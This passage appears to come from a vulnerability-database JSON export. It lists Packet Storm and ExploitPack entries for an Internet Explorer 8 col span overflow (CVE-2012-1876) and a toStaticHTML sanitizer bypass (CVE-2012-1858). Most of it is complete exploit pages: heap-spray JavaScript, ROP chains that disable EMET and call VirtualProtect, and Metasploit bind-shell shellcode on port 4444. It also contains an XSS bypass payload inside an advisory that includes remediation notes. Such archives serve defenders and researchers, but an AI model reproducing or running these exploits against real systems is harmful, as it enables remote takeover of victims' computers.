unescape(\"%u1024%u0000\"); // Size 0x00001024 \nshellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX \nshellcode+= unescape(\"%u0040%u0000\"); // 0x00000040 \nshellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX \nshellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location \nshellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI \nshellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET \nshellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI \nshellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2); // JMP EAX \nshellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX \nshellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect() \nshellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX] \nshellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD \nshellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP \nshellcode+= unescape(\"%u9090%u9090\"); // crap \nshellcode+= unescape(\"%u9090%u9090\"); // crap \n \n// Bind shellcode on 4444 :) \nshellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" + \n\"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" + \n\"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" + \n\"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" + \n\"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" + \n\"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" + \n\"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" + \n\"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" + \n\"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" + \n\"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" + \n\"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" + \n\"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" + \n\"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" + \n\"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" + \n\"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" + \n\"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" + \n\"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" + \n\"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" + \n\"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" + \n\"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" + \n\"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" + \n\"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" + \n\"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" + \n\"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" + \n\"%u006a%uff53%u41d5\"); \n \n \n \nwhile (shellcode.length < 100000) \nshellcode = shellcode + shellcode; \n \nvar onemeg = shellcode.substr(0, 64*1024/2); \n \nfor (i=0; i<14; i++) { \nonemeg += shellcode.substr(0, 64*1024/2); \n} \n \nonemeg += shellcode.substr(0, (64*1024/2)-(38/2)); \n \nvar spray = new Array(); \n \nfor (i=0; i<100; i++) { \nspray[i] = onemeg.substr(0, onemeg.length); \n} \n} \n \nfunction leak(){ \nvar leak_col = document.getElementById(\"132\"); \nleak_col.width = \"41\"; \nleak_col.span = \"19\"; \n} \n \nfunction get_leak() { \nvar str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13)); \nstr_addr = str_addr - 1410704; \nsetTimeout(function(){heapspray(str_addr)}, 200); \n} \n \nfunction trigger_overflow(){ \nvar evil_col = document.getElementById(\"132\"); \nevil_col.width = \"1178993\"; \nevil_col.span = \"44\"; \n} \n \nsetTimeout(function(){leak()}, 300); \nsetTimeout(function(){get_leak()},700); \n//setTimeout(function(){heapspray()}, 900); \nsetTimeout(function(){trigger_overflow()}, 1200); \n \n</script> \n</body> \n</html> \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/119467/ie8fixedcol-overflow.txt"}, {"lastseen": "2016-12-05T22:20:50", "description": "", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "packetstorm", "title": "Internet Explorer 8 Fixed Col Span ID Full ASLR, DEP, And EMET 5.0 Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-1876"], "modified": "2014-09-29T00:00:00", "id": "PACKETSTORM:128476", "href": "https://packetstormsecurity.com/files/128476/Internet-Explorer-8-Fixed-Col-Span-ID-Full-ASLR-DEP-And-EMET-5.0-Bypass.html", "sourceData": "` \n \n<html> \n<body> \n<div id=\"evil\"></div> \n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" > </col></table> \n<script language='javascript'> \n \nfunction strtoint(str) { \nreturn str.charCodeAt(1)*0x10000 + str.charCodeAt(0); \n} \n \nvar free = \"EEEE\"; \nwhile ( free.length < 500 ) free += free; \n \nvar string1 = \"AAAA\"; \nwhile ( string1.length < 500 ) string1 += string1; \n \nvar string2 = \"BBBB\"; \nwhile ( string2.length < 500 ) string2 += string2; \n \nvar fr = new Array(); \nvar al = new Array(); \nvar bl = new Array(); \n \nvar div_container = document.getElementById(\"evil\"); \ndiv_container.style.cssText = \"display:none\"; \n \nfor (var i=0; i < 500; i+=2) { \nfr[i] = free.substring(0, (0x100-6)/2); \nal[i] = string1.substring(0, (0x100-6)/2); \nbl[i] = string2.substring(0, (0x100-6)/2); \nvar obj = document.createElement(\"button\"); \ndiv_container.appendChild(obj); \n} \n \nfor (var i=200; i<500; i+=2 ) { \nfr[i] = null; \nCollectGarbage(); \n} \n \nfunction heapspray(cbuttonlayout) { \nCollectGarbage(); \nvar rop = cbuttonlayout + 4161; // RET \nvar rop = rop.toString(16); \nvar rop1 = rop.substring(4,8); \nvar rop2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 11360; // POP EBP \nvar rop = rop.toString(16); \nvar rop3 = rop.substring(4,8); \nvar rop4 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 111675; // XCHG EAX,ESP \nvar rop = rop.toString(16); \nvar rop5 = rop.substring(4,8); \nvar rop6 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12377; // POP EBX \nvar rop = rop.toString(16); \nvar rop7 = rop.substring(4,8); \nvar rop8 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 642768; // POP EDX \nvar rop = rop.toString(16); \nvar rop9 = rop.substring(4,8); \nvar rop10 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12201; // POP ECX --> Changed \nvar rop = rop.toString(16); \nvar rop11 = rop.substring(4,8); \nvar rop12 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 5504544; // Writable location \nvar rop = rop.toString(16); \nvar writable1 = rop.substring(4,8); \nvar writable2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12462; // POP EDI \nvar rop = rop.toString(16); \nvar rop13 = rop.substring(4,8); \nvar rop14 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12043; // POP ESI --> changed \nvar rop = rop.toString(16); \nvar rop15 = rop.substring(4,8); \nvar rop16 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 63776; // JMP EAX \nvar rop = rop.toString(16); \nvar jmpeax1 = rop.substring(4,8); \nvar jmpeax2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 85751; // POP EAX \nvar rop = rop.toString(16); \nvar rop17 = rop.substring(4,8); \nvar rop18 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 4936; // VirtualProtect() \nvar rop = rop.toString(16); \nvar vp1 = rop.substring(4,8); \nvar vp2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX] \nvar rop = rop.toString(16); \nvar rop19 = rop.substring(4,8); \nvar rop20 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 234657; // PUSHAD \nvar rop = rop.toString(16); \nvar rop21 = rop.substring(4,8); \nvar rop22 = rop.substring(0,4); // } RET \n \n \nvar rop = cbuttonlayout + 408958; // PUSH ESP \nvar rop = rop.toString(16); \nvar rop23 = rop.substring(4,8); \nvar rop24 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 2228408; // POP ECX \nvar rop = rop.toString(16); \nvar rop25 = rop.substring(4,8); \nvar rop26 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 1586172; // POP EAX \nvar rop = rop.toString(16); \nvar rop27 = rop.substring(4,8); \nvar rop28 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX] \nvar rop = rop.toString(16); \nvar rop29 = rop.substring(4,8); \nvar rop30 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 1884912; // PUSH EAX \nvar rop = rop.toString(16); \nvar rop31 = rop.substring(4,8); \nvar rop32 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 2140694; // ADD EAX,ECX \nvar rop = rop.toString(16); \nvar rop33 = rop.substring(4,8); \nvar rop34 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX \nvar rop = rop.toString(16); \nvar rop35 = rop.substring(4,8); \nvar rop36 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 5036248; // ADD ESP,0C \nvar rop = rop.toString(16); \nvar rop37 = rop.substring(4,8); \nvar rop38 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX \nvar rop = rop.toString(16); \nvar rop39 = rop.substring(4,8); \nvar rop40 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 3660458; // MOV EDX,EAX # MOV EAX,EDX # POP ESI \nvar rop = rop.toString(16); \nvar rop41 = rop.substring(4,8); \nvar rop42 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 1560432; // PUSH EDX # CALL EAX \nvar rop = rop.toString(16); \nvar rop43 = rop.substring(4,8); \nvar rop44 = rop.substring(0,4); // } RET \n \nvar getmodulew = cbuttonlayout + 4840; // GetModuleHandleW \nvar getmodulew = getmodulew.toString(16); \nvar getmodulew1 = getmodulew.substring(4,8); \nvar getmodulew2 = getmodulew.substring(0,4); // } RET \n \n \nvar shellcode = unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING \nshellcode+= unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING \nshellcode+= unescape(\"%u4141%u4141\"); // PADDING \n \nshellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN \nshellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN \nshellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN \n \n// EMET disable part 0x01 \n// Implement the Tachyon detection grid to overcome the Romulan cloaking device. \nshellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN \nshellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW Ptr \nshellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN \nshellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN \nshellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN \nshellcode+= unescape(\"%u10c4%u076d\"); // EMET_STRING_PTR (GetModuleHandle argument) \nshellcode+= unescape(\"%ua84c%u000a\"); // EMET_CONFIG_STRUCT offset \nshellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI \nshellcode+= unescape(\"%u10c0%u076d\"); // MEM_ADDRESS_PTR (Store EMET base address here for later) \nshellcode+= unescape(\"%u\"+rop39+\"%u\"+rop40); // MOV DWORD PTR DS:[ESI],EAX \nshellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (Get the address of EMET_CONFIG_STRUCT) \nshellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX] \nshellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI \nshellcode+= unescape(\"%u104c%u076d\"); // Get fake DecodePointer argument from the stack and update it with the encoded value \nshellcode+= unescape(\"%u\"+rop39+\"%u\"+rop40); // MOV DWORD PTR DS:[ESI],EAX \nshellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN \nshellcode+= unescape(\"%u10c0%u076d\"); // Get EMET base address Ptr \nshellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX] \nshellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN \nshellcode+= unescape(\"%u80b0%u0004\"); // Get DecodePointer offset from the stack \nshellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (DecodePointer in IAT) \nshellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX] \nshellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN \nshellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI \nshellcode+= unescape(\"%u9090%u9090\"); // Fake DecodePointer argument (Will be patched) \nshellcode+= unescape(\"%u10bc%u076d\"); // MEM_ADDRESS_PTR (Store decoded pointer here here for later) \nshellcode+= unescape(\"%u\"+rop39+\"%u\"+rop40); // MOV DWORD PTR DS:[ESI],EAX \nshellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN \nshellcode+= unescape(\"%u0558%u0000\"); // ROP Protections offset \nshellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN \nshellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN \nshellcode+= unescape(\"%u0000%u0000\"); // NULL \nshellcode+= unescape(\"%u\"+rop35+\"%u\"+rop36); // MOV DWORD PTR [EAX],ECX # RETN \n// EMET disable part 0x01 end \n \n// Performing a standard Kumeh maneuver ... (VirtualProtect mona chain) \nshellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP \nshellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP \nshellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBP \nshellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024 \nshellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX \nshellcode+= unescape(\"%u0040%u0000\"); // 0x00000040 \nshellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX \nshellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location \nshellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI \nshellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET \nshellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI \nshellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2);// JMP EAX \nshellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX \nshellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect() \nshellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX] \nshellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD \nshellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP \n \n// Store various pointers here \nshellcode+= unescape(\"%u9090%u9090\"); // NOPs \nshellcode+= unescape(\"%u9090%u14eb\"); // NOPs \nshellcode+= unescape(\"%u4242%u4242\"); // Decoded CONFIG structure pointer \nshellcode+= unescape(\"%u4141%u4141\"); // Store BaseAddress address on the *stack* \nshellcode+= \"EMET\"; // EMET string \nshellcode+= unescape(\"%u0000%u0000\"); // EMET string \nshellcode+= unescape(\"%u9090%u9090\"); // NOPs \nshellcode+= unescape(\"%u9090%u9090\"); // NOPs \n// Store various pointers here \n \n// EMET disable part 0x02 \n// MOV EAX,DWORD PTR DS:[076D10BCH] \n// MOV ESI,DWORD PTR [EAX+518H] \n// SUB ESP,2CCH \n// MOV DWORD PTR [ESP],10010H \n// MOV EDI,ESP \n// MOV ECX,2CCH \n// ADD EDI,4 \n// SUB ECX,4 \n// XOR EAX,EAX \n// REP STOS BYTE PTR ES:[EDI] \n// PUSH ESP \n// PUSH 0FFFFFFFEH \n// CALL ESI \nshellcode+= unescape(\"%ubca1%u6d10%u8b07%u18b0%u0005%u8100%uccec\" + \n\"%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9\" + \n\"%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa\" + \n\"%ufe6a%ud6ff\"); \nshellcode+= unescape(\"%u9090%u9090\"); // NOPs \nshellcode+= unescape(\"%u9090%u9090\"); // NOPs \n// EMET disable part 0x02 end \n \n// Bind shellcode on 4444 :) \n// msf > generate -t js_le \n// windows/shell_bind_tcp - 342 bytes \n// http://www.metasploit.com \n// VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, \n// EXITFUNC=process, InitialAutoRunScript=, AutoRunScript= \n// I would keep the shellcode the same size for better reliability :) \n \nshellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" + \n\"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" + \n\"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" + \n\"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" + \n\"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" + \n\"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" + \n\"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" + \n\"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" + \n\"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" + \n\"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" + \n\"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" + \n\"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" + \n\"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" + \n\"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" + \n\"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" + \n\"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" + \n\"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" + \n\"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" + \n\"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" + \n\"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" + \n\"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" + \n\"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" + \n\"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" + \n\"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" + \n\"%u006a%uff53%u41d5\"); \n \n// Total spray should be 1000 \nvar padding = unescape(\"%u9090\"); \nwhile (padding.length < 1000) \npadding = padding + padding; \nvar padding = padding.substr(0, 1000 - shellcode.length); \n \nshellcode+= padding; \n \nwhile (shellcode.length < 100000) \nshellcode = shellcode + shellcode; \n \nvar onemeg = shellcode.substr(0, 64*1024/2); \n \nfor (i=0; i<14; i++) { \nonemeg += shellcode.substr(0, 64*1024/2); \n} \n \nonemeg += shellcode.substr(0, (64*1024/2)-(38/2)); \n \nvar spray = new Array(); \n \nfor (i=0; i<100; i++) { \nspray[i] = onemeg.substr(0, onemeg.length); \n} \n} \n \nfunction leak(){ \nvar leak_col = document.getElementById(\"132\"); \nleak_col.width = \"41\"; \nleak_col.span = \"19\"; \n} \n \nfunction get_leak() { \nvar str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13)); \nstr_addr = str_addr - 1410704; \nvar hex = str_addr.toString(16); \n//alert(hex); \nsetTimeout(function(){heapspray(str_addr)}, 50); \n} \n \nfunction trigger_overflow(){ \nvar evil_col = document.getElementById(\"132\"); \nevil_col.width = \"1245880\"; \nevil_col.span = \"44\"; \n} \n \nsetTimeout(function(){leak()}, 400); \nsetTimeout(function(){get_leak()},450); \nsetTimeout(function(){trigger_overflow()}, 700); \n \n</script> \n</body> \n</html> \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128476/ie8-bypass.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:32", "description": "\nMicrosoft Internet Explorer 9 SharePoint Lync - toStaticHTML HTML Sanitizing Bypass (MS12-037MS12-039MS12-050)", "cvss3": {}, "published": "2012-07-12T00:00:00", "type": "exploitpack", "title": "Microsoft Internet Explorer 9 SharePoint Lync - toStaticHTML HTML Sanitizing Bypass (MS12-037MS12-039MS12-050)", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1858"], "modified": "2012-07-12T00:00:00", "id": "EXPLOITPACK:A4C844F13ADB3E9DD54232C27BB897A6", "href": "", "sourceData": "toStaticHTML: The Second Encounter (CVE-2012-1858)\n\n*HTML Sanitizing Bypass -\n*CVE-2012-1858<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1858>\n\nOriginal advisory -\nhttp://blog.watchfire.com/wfblog/2012/07/tostatichtml-the-second-encounter-cve-2012-1858-html-sanitizing-information-disclosure-introduction-t.html\n\nIntroduction\n\nThe *toStaticHTML* component, which is found in Internet Explorer > 8,\nSharePoint and Lync is used to sanitize HTML fragments from dynamic and\npotentially malicious content.\n\nIf an attacker is able to break the filtering mechanism and pass malicious\ncode through this function, he/she may be able to perform HTML injection\nbased attacks (i.e. XSS).\n\nIt has been a year since the first\nencounter<http://blog.watchfire.com/wfblog/2011/07/tostatichtml-html-sanitizing-bypass.html>\nwas\npublished, we've now returned with a new bypass method.\n\nVulnerability\n\nAn attacker is able to create a specially formed CSS that will overcome *\ntoStaticHTML*'s security logic; therefore, after passing the specially\ncrafted CSS string through the *toStaticHTML* function, it will contain an\nexpression that triggers a JavaScript call.\n\nThe following JavaScript code demonstrates the vulnerability:\n\n*<script>document.write(toStaticHTML(\"<style>\ndiv{font-family:rgb('0,0,0)'''}foo');color=expression(alert(1));{}\n</style><div>POC</div>\"))</script>*\n\nIn this case the function's return value would be JavaScript executable:\n\n*<style>\ndiv{font-family:rgb('0,0,0)''';}foo');color=expression(alert(1));{;}</style>\n<div>POC</div>*\n\n\n\nThe reason this code bypasses the filter engine is due to two reasons:\n\n 1. The filtering engine allows the string \"expression(\" to exists in\n \"non-dangerous\" locations within the CSS.\n 2. A bug in Internet Explorer's CSS parsing engine doesn't properly\n terminate strings that are opened inside brackets and closed outside of\n them.\n\nWhen combining these two factors the attacker is able to \"confuse\" the\nfiltering mechanism into \"thinking\" that a string is open when in fact it\nis terminated and vice versa. With this ability the attacker can trick the\nfiltering mechanism into entering a state of the selector context which is\nconsidered safer where in fact the code is just a new declaration of the\nsame selector, thus breaking the state machine and bypassing the filter.\n\n\n\nImpact\n\nEvery application that relies on the *toStaticHTML* component to sanitize\nuser supplied data had probably been vulnerable to XSS.\n\n\n\nRemediation\n\nMicrosoft has issued several updates to address this vulnerability.\n\nMS12-037 - http://technet.microsoft.com/en-us/security/bulletin/ms12-037\n\nMS12-039 - http://technet.microsoft.com/en-us/security/bulletin/ms12-039\n\nMS12-050 - http://technet.microsoft.com/en-us/security/bulletin/MS12-050", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-01T19:04:32", "description": "\nMicrosoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 5.1 Bypass) (MS12-037)", "cvss3": {}, "published": "2014-11-17T00:00:00", "type": "exploitpack", "title": "Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 5.1 Bypass) (MS12-037)", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1876"], "modified": "2014-11-17T00:00:00", "id": "EXPLOITPACK:87ECAF4F1FACB468F006F877AE38824E", "href": "", "sourceData": "\n\n<html>\n<body>\n<div id=\"evil\"></div>\n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" >\u00a0 </col></table>\n<script language='javascript'>\n\nfunction strtoint(str) {\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\n}\n\nvar free = \"EEEE\";\nwhile ( free.length < 500 ) free += free;\n\nvar string1 = \"AAAA\";\nwhile ( string1.length < 500 ) string1 += string1;\n\nvar string2 = \"BBBB\";\nwhile ( string2.length < 500 ) string2 += string2;\n\nvar fr = new Array();\nvar al = new Array();\nvar bl = new Array();\n\nvar div_container = document.getElementById(\"evil\");\ndiv_container.style.cssText = \"display:none\";\n\nfor (var i=0; i < 500; i+=2) {\n fr[i] = free.substring(0, (0x100-6)/2);\n al[i] = string1.substring(0, (0x100-6)/2);\n bl[i] = string2.substring(0, (0x100-6)/2);\n var obj = document.createElement(\"button\");\n div_container.appendChild(obj);\n}\n\nfor (var i=200; i<500; i+=2 ) {\n fr[i] = null;\n CollectGarbage();\n}\n\nfunction heapspray(cbuttonlayout) {\n CollectGarbage();\n var rop = cbuttonlayout + 4161; // RET\n var rop = rop.toString(16);\n var rop1 = rop.substring(4,8);\n var rop2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 11360; // POP EBP\n var rop = rop.toString(16);\n var rop3 = rop.substring(4,8);\n var rop4 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\n var rop = rop.toString(16);\n var rop5 = rop.substring(4,8);\n var rop6 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12377; // POP EBX\n var rop = rop.toString(16);\n var rop7 = rop.substring(4,8);\n var rop8 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 642768; // POP EDX\n var rop = rop.toString(16);\n var rop9 = rop.substring(4,8);\n var rop10 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\n var rop = rop.toString(16);\n var rop11 = rop.substring(4,8);\n var rop12 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 5504544; // Writable location\n var rop = rop.toString(16);\n var writable1 = rop.substring(4,8);\n var writable2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12462; // POP EDI\n var rop = rop.toString(16);\n var rop13 = rop.substring(4,8);\n var rop14 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\n var rop = rop.toString(16);\n var rop15 = rop.substring(4,8);\n var rop16 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 63776; // JMP EAX\n var rop = rop.toString(16);\n var jmpeax1 = rop.substring(4,8);\n var jmpeax2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 85751; // POP EAX\n var rop = rop.toString(16);\n var rop17 = rop.substring(4,8);\n var rop18 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 4936; // VirtualProtect()\n var rop = rop.toString(16);\n var vp1 = rop.substring(4,8);\n var vp2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\n var rop = rop.toString(16);\n var rop19 = rop.substring(4,8);\n var rop20 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 234657; // PUSHAD\n var rop = rop.toString(16);\n var rop21 = rop.substring(4,8);\n var rop22 = rop.substring(0,4); // } RET\n\n\n var rop = cbuttonlayout + 408958; // PUSH ESP\n var rop = rop.toString(16);\n var rop23 = rop.substring(4,8);\n var rop24 = rop.substring(0,4); // } RET\n\n var rop = 